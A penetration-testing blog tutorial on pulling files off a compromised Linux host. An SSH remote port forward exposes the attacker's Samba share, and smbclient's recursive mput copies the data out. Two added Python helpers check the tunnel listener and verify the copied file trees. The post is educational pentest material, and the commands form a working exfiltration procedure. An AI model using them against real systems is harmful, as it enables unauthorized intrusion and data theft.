File transfer from compromised machine to attacking machine via SSH tunnel with SMB service

Khurshid Hassan
10 min read · Oct 9, 2020

(Useful when the attacking machine sits behind dynamic NAT and is not reachable directly from the internet.)

Motive of the demonstration:

We have plenty of file transfer mechanisms to choose from during a penetration testing engagement, and one of them is transferring through an SMB service.

If, during an engagement, we need to move files from a compromised machine to the attacking machine, the SMB service can do the job under the conditions described below, with SSH tunneling protecting the whole transfer.

SSH tunneling also lets smbclient on the compromised machine reach our SMB server through the loopback address 127.0.0.1, so no public IP is needed; a public IP would not reach our attacking machine anyway, since it sits behind NAT.

Why the SMB service?

File transfer can also be done with other services such as SCP, rsync, FTP, TFTP and, to some extent, a web server (which only supports transfer in one direction). These services may be present on a Linux machine but are not necessarily available on a Windows machine.

When we use the SMB service for file transfer we can use it equally from both Linux and Windows machines.

The only difference is that the Windows copy utility can read and write network resources (UNC paths) as well as local resources, so on Windows no additional utility is required to talk to the SMB server.

On Linux an SMB client utility is required, because the built-in cp command cannot read and write data on a network resource directly the way the Windows copy utility can (unless the share has first been mounted).

The conditions:

The attacking machine is in a dynamic NAT environment (the normal situation when connecting from behind an ordinary Wi-Fi router).

We have obtained a username and password (or key) that lets us make an SSH connection from our attacking machine to the compromised machine.

For demonstration purposes I have used two Linux machines, though the pair could also be Linux and Windows.

Remote machine -> Hostname: Kali_on_Cloud (a Kali instance in the cloud, playing the compromised machine)

Local machine -> Hostname: Kali (a local instance of Kali running on my laptop, the attacking machine)

Let's start …

File transfer from the victim to the attacking machine is crucial and a bit tricky to handle.

If the victim is a Linux machine it already has SSH, and therefore SCP, installed by default, so they can be used as living-off-the-land tools and no tool or binary needs to be deployed there. The issue I observed is that copying a single file through SCP is easy, but copying an entire folder is painful and takes a huge amount of time.

The other option I could find to make the job easier is to use the SMB protocol to share the files from one end to the other.

I could have run an SMB server on the remote machine (my cloud instance of Kali) and connected to it from my local Kali instance if I had root privileges on the compromised machine, but I want to do it the other way round, assuming I do not have root privileges there (though here I am using the root user to connect to my Kali instance in the cloud, purely for demonstration purposes).

Since I cannot run the SMB service on the remote machine for lack of privileges (the assumption here), I want to run the SMB server on my local Kali instance and connect to it from the remote machine. That is not possible directly either, because my machine is not reachable from the internet: it sits behind dynamic NAT.

The simple rule is this: if you are behind dynamic NAT (not static or one-to-one NAT) and there is no port forward to your machine's private IP, nobody on the internet can connect to your machine. Your machine has a dynamically NATed private IP, the incoming connection is addressed to your public IP, and without a port forward the router has no idea where to send that traffic.

Since no static NAT is configured on my internet router, I cannot connect to my machine behind the dynamic NAT from the remote machine.

The options would be either to set a port forward on my internet router, so that a remote connection arriving at my public IP on a specific port is routed to my machine, or to set up one-to-one (static) NAT, which ordinary home routers do not offer.

In this situation the best way to deal with it is an SSH connection with a bit of SSH tunneling gymnastics.

Keep in mind that every TCP connection here is established in only one direction: from my local machine to the remote machine, never the other way round.

While establishing the SSH connection, a remote port forward is created that exposes my local Samba service on a port of the remote machine.

Once that is done, smbclient does not need to reach the SMB service on my local machine through a public IP; it connects to the loopback address 127.0.0.1 on the remote machine, which is where the SSH tunnel listens for the forwarded port.

Let's begin …

First, let's run the SMB server on the local machine. Let's try the easy way first: smbserver.py from the impacket Python module.

SMB service running via smbserver.py, a Python script from the impacket module.

Let's connect to the cloud instance of Kali with SSH.

Connection established from the local Kali instance to the Kali instance in the cloud.

Let's check from the cloud instance of Kali whether an SMB service is listening on 127.0.0.1 port 445.

No, it is not listening. That means no SSH tunnel has been created yet that forwards the port between my local machine and the remote machine.

Let's do it …

This time I will exit the SSH session and re-establish it, but with port forwarding instructions.

root@kali:~# ssh -i /root/kali_on_cloud/id_rsa -R 445:127.0.0.1:445 root@165.xxx.xx.xxx

What the above command is doing:

It creates an SSH tunnel from my local Kali instance to the remote machine with a remote port forward (-R). In other words, I am exposing my SMB service, running locally on port 445, on port 445 of the remote machine.

If someone on the remote machine connects to port 445 on the loopback address 127.0.0.1, which is where the SSH tunnel listens for the forwarded port, the connection travels back through the tunnel to port 445 on my local machine and reaches the service running there.

SSH connection established from the local Kali instance to the Kali instance in the cloud (remote machine). The SMB server is running on the local Kali instance and port forwarding is enabled through the SSH tunnel.

Let's check from the remote machine whether it can now reach the SMB service running on my local machine by connecting to the loopback address 127.0.0.1 on local port 445 (local from the remote machine's perspective).

Yes, it does now!

Netcat shows the connection is open on the SMB port, and a connection has also been received on the local Kali side, where the SMB server is running.

Let's connect to the SMB share from the remote machine now. (Direction of the connection: cloud instance of Kali/smbclient -> local instance of Kali/smb share, because we cannot reach our Kali from the remote machine while it sits behind NAT.)
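Netcat is not always present on a compromised host, but /proc/net/tcp is on any Linux box, so the same "is 127.0.0.1:445 listening?" check can be done by reading that file. The script below is an added example and not part of the original post: it parses a constructed /proc/net/tcp sample showing what the remote side looks like once the -R tunnel is up (sshd's forwarded listener on 127.0.0.1:445, sshd on port 22, and our own SSH session), and when run directly it reads the real file. The function names are mine, and the little-endian decoding assumes an x86/ARM host.

```python
import socket
import struct
import sys

# Constructed sample of /proc/net/tcp, as the remote machine would show it once
# the -R 445:127.0.0.1:445 tunnel is up: sshd's remote-forward listener on
# 127.0.0.1:445, sshd itself on 0.0.0.0:22 and our established SSH session.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:01BD 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 31337 1 0000000000000000 100 0 0 10 0
   1: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12001 1 0000000000000000 100 0 0 10 0
   2: 0A00020F:0016 C0A80165:D431 01 00000000:00000000 00:00000000 00000000     0        0 44821 1 0000000000000000 20 4 30 10 -1
"""

TCP_LISTEN = "0A"  # socket state code for LISTEN in /proc/net/tcp


def decode_addr(hex_addr):
    """Turn 'HHHHHHHH:PPPP' into ('a.b.c.d', port).

    The kernel prints the IPv4 address as one 32-bit word in host byte order;
    on little-endian hosts (x86, ARM) the octets therefore appear reversed.
    """
    ip_hex, port_hex = hex_addr.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
    return ip, int(port_hex, 16)


def listening_sockets(proc_net_tcp_text):
    """Return [(ip, port), ...] for every socket in LISTEN state."""
    found = []
    for line in proc_net_tcp_text.splitlines()[1:]:  # skip the header row
        fields = line.split()
        if len(fields) < 4 or fields[3] != TCP_LISTEN:
            continue
        found.append(decode_addr(fields[1]))
    return found


def is_listening(proc_net_tcp_text, ip, port):
    """True if something listens on exactly ip:port (e.g. the forwarded SMB port)."""
    return (ip, port) in listening_sockets(proc_net_tcp_text)


def exposed_beyond_loopback(proc_net_tcp_text, port):
    """True if a listener on `port` is bound to something other than 127.0.0.1.

    If the remote sshd had GatewayPorts enabled, the forwarded port would be
    bound to 0.0.0.0 and our Samba share would be reachable from the whole
    internet through the compromised host; this is the check for that.
    """
    return any(p == port and ip != "127.0.0.1"
               for ip, p in listening_sockets(proc_net_tcp_text))


if __name__ == "__main__":
    # Run on the remote machine:  python3 check_tunnel.py [port]
    port = int(sys.argv[1]) if len(sys.argv) > 1 else 445
    with open("/proc/net/tcp") as fh:
        text = fh.read()
    print("forwarded port listening on 127.0.0.1:", is_listening(text, "127.0.0.1", port))
    print("exposed beyond loopback:", exposed_beyond_loopback(text, port))
```

Only /proc/net/tcp (IPv4) is read; an IPv6 loopback listener would appear in /proc/net/tcp6 instead, which the same parser does not cover.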

smbclient -U root%VerySecret123 -p 445 //127.0.0.1/myshare

smbclient connected to the SMB share served by smbserver.py. (Note that the -U user%password form puts the share password on the command line, where it is visible to other users of the compromised machine through the process list.)

Everything is fine so far, but I found some issues with the impacket SMB server script.

While copying files and folders I observed an issue with smbserver.py. Putting files from the remote machine onto the SMB share looked fine, but when it came to copying a folder, smbserver.py used to close the connection. It was unstable.

So I decided to try starting a Samba server on my local Kali instead of running smbserver.py from the impacket Python module.

For this I made some changes on my local Kali:

root@kali:~# mkdir /media/share (creates the shared folder)

root@kali:~# adduser --system username (creates the user who will access the share)

root@kali:~# chown -R username /media/share (gives the user ownership of the share folder)

root@kali:~# smbpasswd -a username (creates an SMB password for the newly created user and adds the user to the Samba password database; this password is separate from the Linux account password)

root@kali:~# smbpasswd -e username (enables the newly created user in Samba)

Then I added the share definition below to /etc/samba/smb.conf:

# share
[myshare]
path = /media/share
valid users = username
writeable = yes
browseable = yes
create mask = 0644
directory mask = 0755
force user = username

Starting the Samba service on the local Kali (the attacking machine):

root@kali:~# systemctl start smbd (starts the Samba service)

Let's begin again by connecting smbclient from the remote machine to the SMB share served by the Samba server running on my local machine.

root@kali:~# ssh -i /root/kali_on_cloud/id_rsa -R 445:127.0.0.1:445 root@165.xxx.xx.xxx

# -R is remote port forwarding

With -R the listening socket is opened by sshd on the remote machine, and by default it is bound to the remote loopback only (GatewayPorts defaults to no), which is exactly what we want. Nothing has to bind port 445 on the local side: the local end of the tunnel is just an outbound connection to 127.0.0.1:445, where Samba is already listening. Two things must hold on the remote side: sshd must allow TCP forwarding (AllowTcpForwarding, enabled by default), and, because 445 is a privileged port, OpenSSH only opens a remote listener below 1024 for the root user. If the compromised account is unprivileged, forward to an unprivileged remote port (anything above 1023) instead and give smbclient that port with -p.

Note:

Instead of root, any compromised user or any user whose credentials were stolen can be used for the SSH connection during a pentest.

Once the connection to the remote machine is established I can see the files and folders below, which need to be copied to my local machine using the SMB service.

OK … let's try again.

Let's check whether the SMB server running on my local machine is reachable through the SSH port forward when a connection is made from the remote machine to its loopback address on local port 445.

Yes, it connects to the service through the loopback address used by the SSH tunnel between my local machine and the remote machine.

Time to connect to the SMB share with the smbclient already installed on the remote machine.

root@Kali_on_cloud:~# smbclient -U smb_user%smb_password -p 445 //127.0.0.1/myshare

Edit: under zsh the command had to be given in the order below:

root@Kali_on_cloud:~# smbclient -p 445 //127.0.0.1/myshare -U smb_user%smb_password

And yes, the connection was established as expected.

Before copying the files from the remote machine to my local machine, let's check whether there is anything in my local machine's share folder.

No, there is no file or folder there yet.

Let's run the commands below in the smbclient shell on the remote machine:

smb: \> recurse ON (tells smbclient to descend into folders and subfolders)

smb: \> prompt OFF (tells smbclient not to ask for confirmation for each file and folder it copies)

smb: \> mput * (put copies a single file from the smbclient side to the share; mput takes a wildcard and copies everything that matches, descending into directories when recurse is ON)

Let's check the result.

Hmm … the files have started copying from the remote machine to the local machine.

Let's check whether we really have the files and folders from the remote machine on our local machine.

Yes, it succeeded: we have a copy of the remote machine's files on our local machine.
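A listing on the share proves that files arrived, not that all of them arrived intact; the smbserver.py behaviour described earlier (connection closed part way through a folder) is exactly the case where mput stops silently. The script below is an added example, not from the original post: it hashes every file under a directory and compares two such listings, so it can be run on the compromised machine against the source folder and on the attacking machine against /media/share. The demo builds a constructed pair of directories (one file dropped, one truncated) to show what the report looks like; the function names are mine.

```python
import hashlib
import json
import sys
import tempfile
from pathlib import Path


def tree_digest(root):
    """Map each regular file under root (relative POSIX path) to its SHA-256."""
    root = Path(root)
    digests = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        h = hashlib.sha256()
        with path.open("rb") as fh:
            for chunk in iter(lambda: fh.read(1 << 16), b""):
                h.update(chunk)
        digests[path.relative_to(root).as_posix()] = h.hexdigest()
    return digests


def compare_trees(source, dest):
    """Report what the copy on the share is missing or got wrong.

    missing:    at the source, absent on the share (dropped mid-transfer)
    mismatched: on both sides but with different content (truncated/corrupted)
    extra:      on the share but not at the source (stale files from an earlier run)
    """
    return {
        "missing": sorted(set(source) - set(dest)),
        "mismatched": sorted(p for p in source if p in dest and source[p] != dest[p]),
        "extra": sorted(set(dest) - set(source)),
    }


def build_demo_trees(base):
    """Constructed sample: a source tree and a copy where the transfer went wrong."""
    src = Path(base) / "victim_loot"
    dst = Path(base) / "share"
    originals = {
        "notes.txt": b"hello\n",
        "creds/db.conf": b"password=hunter2\n",
        "logs/auth.log": b"x" * 5000,
    }
    for rel, data in originals.items():
        p = src / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_bytes(data)
    # The "copy": db.conf never arrived and auth.log was cut off at 4096 bytes.
    (dst / "logs").mkdir(parents=True, exist_ok=True)
    (dst / "notes.txt").write_bytes(originals["notes.txt"])
    (dst / "logs" / "auth.log").write_bytes(b"x" * 4096)
    return src, dst


def demo():
    """Run the comparison on the constructed trees and return the report."""
    with tempfile.TemporaryDirectory() as tmp:
        src, dst = build_demo_trees(tmp)
        return compare_trees(tree_digest(src), tree_digest(dst))


if __name__ == "__main__":
    # Usage:  python3 treehash.py <dir>             -> digest listing as JSON
    #         python3 treehash.py <src.json> <dir>  -> compare a saved listing to <dir>
    #         python3 treehash.py                   -> run the constructed demo
    if len(sys.argv) == 2:
        print(json.dumps(tree_digest(sys.argv[1]), indent=2))
    elif len(sys.argv) == 3:
        with open(sys.argv[1]) as fh:
            saved = json.load(fh)
        print(json.dumps(compare_trees(saved, tree_digest(sys.argv[2])), indent=2))
    else:
        print(json.dumps(demo(), indent=2))
```

The digest listing produced on the victim is small enough to send back over the same share or the SSH session, and since only hashes cross the wire the comparison can be repeated after each retry without re-copying the whole folder.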

Conclusion of this demonstration:

If you are in a situation where SCP, rsync, FTP and the like are not available but smbclient is, the SMB service can be used for file transfer, and it works on both kinds of machines, Linux as well as Windows.

Windows has an advantage over Linux here: it needs no additional utility, because its copy utility can read and write network resources on its own, and it also transfers faster than smbclient.

SSH makes the transfer possible when no connection can be made to the attacking machine directly from the internet because it sits behind NAT with a private IP.

Give the SMB service with the SSH tunneling technique a try for your next file transfer. It will make your life a bit easier.


Khurshid Hassan

A security enthusiast who loves to learn by breaking things to understand how they work, and who likes to develop a mindset for how hackers and script kiddies operate.